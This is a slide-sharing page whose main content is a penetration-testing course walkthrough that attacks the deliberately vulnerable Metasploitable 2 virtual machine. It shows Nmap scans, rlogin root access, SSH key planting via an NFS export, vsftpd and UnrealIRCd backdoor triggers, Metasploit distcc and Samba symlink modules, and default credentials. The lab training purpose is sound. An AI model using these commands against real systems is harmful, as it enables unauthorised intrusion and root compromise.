1. Massive Machine-Type Communication.pptx
1. Massive Machine-Type Communication.pptx1. Massive Machine-Type Communication.pptx
1. Massive Machine-Type Communication.pptx
 
1. Coordinated Multi-Point Transmission in 5G.pptx
1. Coordinated Multi-Point Transmission in 5G.pptx1. Coordinated Multi-Point Transmission in 5G.pptx
1. Coordinated Multi-Point Transmission in 5G.pptx
 
Real time operating systems
Real time operating systemsReal time operating systems
Real time operating systems
 
Reliability and clock synchronization
Reliability and clock synchronizationReliability and clock synchronization
Reliability and clock synchronization
 
Low power embedded system design
Low power embedded system designLow power embedded system design
Low power embedded system design
 
Performance Analysis of MIMO–OFDM for PCHBF , RELAY Technique with MMSE For T...
Performance Analysis of MIMO–OFDM for PCHBF , RELAY Technique with MMSE For T...Performance Analysis of MIMO–OFDM for PCHBF , RELAY Technique with MMSE For T...
Performance Analysis of MIMO–OFDM for PCHBF , RELAY Technique with MMSE For T...
 
Telecommunication systems
Telecommunication systemsTelecommunication systems
Telecommunication systems
 
Home appliances
Home appliancesHome appliances
Home appliances
 
loudspeakers and microphones
loudspeakers and microphonesloudspeakers and microphones
loudspeakers and microphones
 
Television standards and systems
Television standards and systemsTelevision standards and systems
Television standards and systems
 

Recently uploaded

How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17Celine George
 
CHUYÊN ĐỀ ÔN THEO CÂU CHO HỌC SINH LỚP 12 ĐỂ ĐẠT ĐIỂM 5+ THI TỐT NGHIỆP THPT ...
CHUYÊN ĐỀ ÔN THEO CÂU CHO HỌC SINH LỚP 12 ĐỂ ĐẠT ĐIỂM 5+ THI TỐT NGHIỆP THPT ...CHUYÊN ĐỀ ÔN THEO CÂU CHO HỌC SINH LỚP 12 ĐỂ ĐẠT ĐIỂM 5+ THI TỐT NGHIỆP THPT ...
CHUYÊN ĐỀ ÔN THEO CÂU CHO HỌC SINH LỚP 12 ĐỂ ĐẠT ĐIỂM 5+ THI TỐT NGHIỆP THPT ...Nguyen Thanh Tu Collection
 
Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...
Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...
Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...Osopher
 
Q-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITWQ-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITWQuiz Club NITW
 
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptx
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptxBIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptx
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptxSayali Powar
 
6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroomSamsung Business USA
 
4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptx4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptxmary850239
 
PART 1 - CHAPTER 1 - CELL THE FUNDAMENTAL UNIT OF LIFE
PART 1 - CHAPTER 1 - CELL THE FUNDAMENTAL UNIT OF LIFEPART 1 - CHAPTER 1 - CELL THE FUNDAMENTAL UNIT OF LIFE
PART 1 - CHAPTER 1 - CELL THE FUNDAMENTAL UNIT OF LIFEMISSRITIMABIOLOGYEXP
 
4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptx4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptxmary850239
 
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptx
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptxDecoding the Tweet _ Practical Criticism in the Age of Hashtag.pptx
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptxDhatriParmar
 
physiotherapy in Acne condition.....pptx
physiotherapy in Acne condition.....pptxphysiotherapy in Acne condition.....pptx
physiotherapy in Acne condition.....pptxAneriPatwari
 
The Emergence of Legislative Behavior in the Colombian Congress
The Emergence of Legislative Behavior in the Colombian CongressThe Emergence of Legislative Behavior in the Colombian Congress
The Emergence of Legislative Behavior in the Colombian CongressMaria Paula Aroca
 
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...Nguyen Thanh Tu Collection
 
Mythology Quiz-4th April 2024, Quiz Club NITW
Mythology Quiz-4th April 2024, Quiz Club NITWMythology Quiz-4th April 2024, Quiz Club NITW
Mythology Quiz-4th April 2024, Quiz Club NITWQuiz Club NITW
 
Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...
Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...
Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...DrVipulVKapoor
 
Unraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptx
Unraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptxUnraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptx
Unraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptxDhatriParmar
 
Objectives n learning outcoms - MD 20240404.pptx
Objectives n learning outcoms - MD 20240404.pptxObjectives n learning outcoms - MD 20240404.pptx
Objectives n learning outcoms - MD 20240404.pptxMadhavi Dharankar
 
BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...
BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...
BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...Nguyen Thanh Tu Collection
 

Recently uploaded (20)

How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17
 
CHUYÊN ĐỀ ÔN THEO CÂU CHO HỌC SINH LỚP 12 ĐỂ ĐẠT ĐIỂM 5+ THI TỐT NGHIỆP THPT ...
CHUYÊN ĐỀ ÔN THEO CÂU CHO HỌC SINH LỚP 12 ĐỂ ĐẠT ĐIỂM 5+ THI TỐT NGHIỆP THPT ...CHUYÊN ĐỀ ÔN THEO CÂU CHO HỌC SINH LỚP 12 ĐỂ ĐẠT ĐIỂM 5+ THI TỐT NGHIỆP THPT ...
CHUYÊN ĐỀ ÔN THEO CÂU CHO HỌC SINH LỚP 12 ĐỂ ĐẠT ĐIỂM 5+ THI TỐT NGHIỆP THPT ...
 
Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...
Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...
Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...
 
Q-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITWQ-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITW
 
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptx
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptxBIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptx
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptx
 
6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom
 
4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptx4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptx
 
PART 1 - CHAPTER 1 - CELL THE FUNDAMENTAL UNIT OF LIFE
PART 1 - CHAPTER 1 - CELL THE FUNDAMENTAL UNIT OF LIFEPART 1 - CHAPTER 1 - CELL THE FUNDAMENTAL UNIT OF LIFE
PART 1 - CHAPTER 1 - CELL THE FUNDAMENTAL UNIT OF LIFE
 
4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptx4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptx
 
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptx
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptxDecoding the Tweet _ Practical Criticism in the Age of Hashtag.pptx
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptx
 
Introduction to Research ,Need for research, Need for design of Experiments, ...
Introduction to Research ,Need for research, Need for design of Experiments, ...Introduction to Research ,Need for research, Need for design of Experiments, ...
Introduction to Research ,Need for research, Need for design of Experiments, ...
 
Chi-Square Test Non Parametric Test Categorical Variable
Chi-Square Test Non Parametric Test Categorical VariableChi-Square Test Non Parametric Test Categorical Variable
Chi-Square Test Non Parametric Test Categorical Variable
 
physiotherapy in Acne condition.....pptx
physiotherapy in Acne condition.....pptxphysiotherapy in Acne condition.....pptx
physiotherapy in Acne condition.....pptx
 
The Emergence of Legislative Behavior in the Colombian Congress
The Emergence of Legislative Behavior in the Colombian CongressThe Emergence of Legislative Behavior in the Colombian Congress
The Emergence of Legislative Behavior in the Colombian Congress
 
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
 
Mythology Quiz-4th April 2024, Quiz Club NITW
Mythology Quiz-4th April 2024, Quiz Club NITWMythology Quiz-4th April 2024, Quiz Club NITW
Mythology Quiz-4th April 2024, Quiz Club NITW
 
Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...
Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...
Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...
 
Unraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptx
Unraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptxUnraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptx
Unraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptx
 
Objectives n learning outcoms - MD 20240404.pptx
Objectives n learning outcoms - MD 20240404.pptxObjectives n learning outcoms - MD 20240404.pptx
Objectives n learning outcoms - MD 20240404.pptx
 
BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...
BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...
BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...
 

Metasploitable

  • 1. NIT Nagaland - Online FDP - Cyber Security The Art of Network Exploitation - Walkthrough   Metasploitable : Metasploitable is a virtual machine with several intentional misconfigurations and vulnerabilities for you to exploit. This is a great tool for sharpening your penetration testing skills. Download Metasploitable : Grab a copy of the Metasploitable virtual machine at: ​SourceForge While you are waiting for the file to download you can start setting up the VM. Create the VirtualBox VM Create a new virtual machine in Virtual Box. Give the machine a descriptive name, and select Linux as the type.
  • 2. Use an Existing Hard Disk During the installation select Use an Existing Hard Disk File and select the downloaded Metasploitable vmdk file.
  • 3. Once the machine has been created, go ahead and fire it up. Start the VM After the initial boot process you will be greeted by the Metasploitable login screen. The default username is “msfadmin”, and the default password is also “msfadmin”. That is all it takes to install Metasploitable. Now you may be wondering where to begin…. Getting Started After the virtual machine boots, login to console with username ​msfadmin​ and password ​msfadmin​.  From the shell, run the ​ifconfig​ command to identify the IP address.  msfadmin@metasploitable:~$ ifconfig eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1 inet addr:192.168.99.131 Bcast:192.168.99.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
  • 4. Services From our attack system (Linux, preferably something like Kali Linux), we will identify the open  network services on this virtual machine using the ​Nmap Security Scanner​. The following command  line will scan all TCP ports on the Metasploitable 2 instance:  root@ubuntu:~# nmap -p0-65535 192.168.99.131 Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT Nmap scan report for 192.168.99.131 Host is up (0.00028s latency). Not shown: 65506 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry
  • 5. 1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql 3632/tcp open distccd 5432/tcp open postgresql 5900/tcp open vnc 6000/tcp open X11 6667/tcp open irc 6697/tcp open unknown 8009/tcp open ajp13 8180/tcp open unknown 8787/tcp open unknown 39292/tcp open unknown 43729/tcp open unknown 44813/tcp open unknown 55852/tcp open unknown MAC Address: 00:0C:29:9A:52:C1 (VMware) Nearly every one of these listening services provides a remote entry point into the system. In the  next section, we will walk through some of these vectors.  Unix Basics TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured to allow remote  access from any host (a standard ".rhosts + +" situation). To take advantage of this, make sure the  "rsh-client" client is installed (on Ubuntu), and run the following command as your local root user. If 
  • 6. you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu  is defaulting to using SSH.  # rlogin -l root 192.168.99.131 Last login: Fri Jun 1 00:10:39 EDT 2012 from :0.0 on pts/0 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 root@metasploitable:~# This is about as easy as it gets. The next service we should look at is the Network File System (NFS).  NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services.  The example below using ​rpcinfo​ to identify NFS and ​showmount -e​ to determine that the "/" share  (the root of the file system) is being exported. You will need the rpcbind and nfs-common Ubuntu  packages to follow along.  root@ubuntu:~# rpcinfo -p 192.168.99.131 program vers proto port service 100000 2 tcp 111 portmapper 100000 2 udp 111 portmapper 100024 1 udp 53318 status 100024 1 tcp 43729 status 100003 2 udp 2049 nfs 100003 3 udp 2049 nfs 100003 4 udp 2049 nfs 100021 1 udp 46696 nlockmgr 100021 3 udp 46696 nlockmgr 100021 4 udp 46696 nlockmgr 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs
  • 7. 100021 1 tcp 55852 nlockmgr 100021 3 tcp 55852 nlockmgr 100021 4 tcp 55852 nlockmgr 100005 1 udp 34887 mountd 100005 1 tcp 39292 mountd 100005 2 udp 34887 mountd 100005 2 tcp 39292 mountd 100005 3 udp 34887 mountd 100005 3 tcp 39292 mountd root@ubuntu:~# showmount -e 192.168.99.131 Export list for 192.168.99.131: / * Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH  is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add  our key to the root user account's authorized_keys file:  root@ubuntu:~# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/id_rsa.pub. root@ubuntu:~# mkdir /tmp/r00t root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/
  • 8. root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys root@ubuntu:~# umount /tmp/r00t root@ubuntu:~# ssh root@192.168.99.131 Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 root@metasploitable:~# Backdoors On port 21, Metasploitable2 runs vsftpd, a popular FTP server. This particular version ​contains a  backdoor​ that was slipped into the source code by an unknown intruder. The backdoor was quickly  identified and removed, but not before quite a few people downloaded it. If a username is sent that  ends in the sequence ​:)​ [ a happy face ], the backdoored version will open a listening shell on port  6200. We can demonstrate this with telnet or use the ​Metasploit Framework module​ to  automatically exploit it:  root@ubuntu:~# telnet 192.168.99.131 21 Trying 192.168.99.131... Connected to 192.168.99.131. Escape character is '^]'. 220 (vsFTPd 2.3.4) user backdoored:) 331 Please specify the password. pass invalid ^] telnet> quit Connection closed. root@ubuntu:~# telnet 192.168.99.131 6200
  • 9. Trying 192.168.99.131... Connected to 192.168.99.131. Escape character is '^]'. id; uid=0(root) gid=0(root) On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. This version contains a backdoor  that ​went unnoticed for months​ - triggered by sending the letters "AB" following by a system  command to the server on any listening port. Metasploit has a ​module​ to exploit this in order to gain  an interactive shell, as shown below.  msfconsole msf > use exploit/unix/irc/unreal_ircd_3281_backdoor msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131 msf exploit(unreal_ircd_3281_backdoor) > exploit [*] Started reverse double handler [*] Connected to 192.168.99.131:6667... :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead [*] Sending backdoor command... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo 8bMUYsfmGvOLHBxe; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B
  • 10. [*] B: "8bMUYsfmGvOLHBxern" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700 id uid=0(root) gid=0(root) Much less subtle is the old standby "ingreslock" backdoor that is listening on port 1524. The  ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server.  Accessing it is easy:  root@ubuntu:~# telnet 192.168.99.131 1524 Trying 192.168.99.131... Connected to 192.168.99.131. Escape character is '^]'. root@metasploitable:/# id uid=0(root) gid=0(root) groups=0(root) Unintentional Backdoors In addition to the malicious backdoors in the previous section, some services are almost backdoors  by their very nature. The first of which installed on Metasploitable2 is distccd. This program makes it  easy to scale large compiler jobs across a farm of like-configured systems. The problem with this  service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by  the ​Metasploit module​ usage below.  msfconsole msf > use exploit/unix/misc/distcc_exec msf exploit(distcc_exec) > set RHOST 192.168.99.131
  • 11. msf exploit(distcc_exec) > exploit [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo uk3UdiwLUq0LX3Bi; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "uk3UdiwLUq0LX3Birn" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897) at 2012-05-31 22:06:03 -0700 id uid=1(daemon) gid=1(daemon) groups=1(daemon) Samba, when configured with a writeable file share and "​wide links​" enabled (default is on), can also  be used as a backdoor of sorts to access files that were not meant to be shared. The example below  uses a ​Metasploit module​ to provide access to the root filesystem using an anonymous connection  and a writeable share.  root@ubuntu:~# smbclient -L //192.168.99.131 Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian] Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers
  • 12. tmp Disk oh noes! opt Disk IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) root@ubuntu:~# msfconsole msf > use auxiliary/admin/smb/samba_symlink_traversal msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131 msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp msf auxiliary(samba_symlink_traversal) > exploit [*] Connecting to the server... [*] Trying to mount writeable share 'tmp'... [*] Trying to link 'rootfs' to the root filesystem... [*] Now access the following share to browse the root filesystem: [*] 192.168.99.131tmprootfs msf auxiliary(samba_symlink_traversal) > exit root@ubuntu:~# smbclient //192.168.99.131/tmp Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian] smb: > cd rootfs smb: rootfs> cd etc smb: rootfsetc> more passwd getting file rootfsetcpasswd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec) root:x:0:0:root:/root:/bin/bash
  • 13. daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh [..] Weak Passwords In additional to the more blatant backdoors and misconfigurations, Metasploitable 2 has terrible  password security for both system and database server accounts. The primary administrative user  msfadmin​ has a password matching the username. By discovering the list of users on this system,  either by using another flaw to capture the passwd file, or by enumerating these user IDs via Samba,  a brute force attack can be used to quickly access multiple user accounts. At a minimum, the  following weak system accounts are configured on the system.    In addition to these system-level accounts, the PostgreSQL service can be accessed with username  postgres​ and password ​postgres​, while the MySQL service is open to username ​root​ with an empty  password. The VNC service provides remote desktop access using the password ​password​.